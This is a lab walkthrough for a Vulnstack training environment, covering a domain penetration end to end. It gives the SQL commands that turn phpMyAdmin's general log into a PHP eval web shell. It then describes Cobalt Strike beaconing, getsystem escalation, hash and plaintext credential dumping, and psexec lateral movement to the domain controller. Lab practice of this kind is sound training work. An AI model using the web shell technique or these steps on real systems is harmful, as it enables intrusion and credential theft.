Introduction#
The target environment comes from: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
A simple target environment originally intended for student assessments, but it was not utilized. The lateral domain penetration only used the psexec module from Cobalt Strike, and the main content is to familiarize oneself with some penetration processes.
Many vulnerabilities in the target environment could not be successfully reproduced due to some environmental issues, but the overall process is fine.
Environment Setup#
You need to disable accelerated 3D graphics; otherwise, the virtual machine cannot start.
The topology is as follows:
The network settings are as follows, using VMnet2 and VMnet8:
Web server (VM1) - Win7 (dual network card, NAT mode + vmnet2 (host-only))
IP: 192.168.111.128 and 192.168.52.143
Start phpstudy
DNS points to DC
Win2008 DC (VM3)
IP: 192.168.52.138
Win03 domain member (VM2)
IP: 192.168.52.141
View the current domain
Penetration Process#
Information Gathering#
Nmap Port Scanning#
Sword Scanning#
Directory Scanning#
phpinfo page
phpMyAdmin Login#
If the password is: root/root
phpMyAdmin Getshell#
Get shell through logs
Check if logging is enabled and the log storage location: SHOW VARIABLES LIKE "general_log%";
Enable logging: set global general_log='on';
Check if enabled: SHOW VARIABLES LIKE "general_log%"
Set the log file to a malicious file, first find the website directory
Set the log path: set global general_log_file ='C:\\phpStudy\\WWW\\s.php';
Successfully set
After preparing the work, start writing the shell. You only need to query through SQL statements.
select "<?php @eval($_POST[cmd]);?>";
Access web shell:
http://192.168.111.128/ss.php
Ant Sword connection:
The website's port 80 is yxcms
Log in to the backend, and you can also execute SQL statements.
Web shell view IP address
Found dual network cards
Cobalt Strike Startup#
Go online to operate on Cobalt Strike.
Server
Client
Establish a listener
Generate payload
Upload the payload to Ant Sword for execution
Run exe, Cobalt Strike goes online.
Sleep 0
Shell whoami
Privilege Escalation#
Use getsystem on Cobalt Strike to elevate privileges and obtain system permissions.
Internal Network Information Collection#
Click target to find three machines. If nothing opens, scan the ports, and you will find them.
Dump hash
Obtain plaintext passwords
Lateral Movement#
After obtaining the password, use psexec for lateral movement. Here, the passwords for the three machines are the same; if they are different, lateral movement via SMB will not be possible.
Select psexec64, 64-bit
Obtain the domain controller server.
Using the same method to control the 141, the Win2003 domain member machine.
You need to select psexec, 32-bit
Check the IP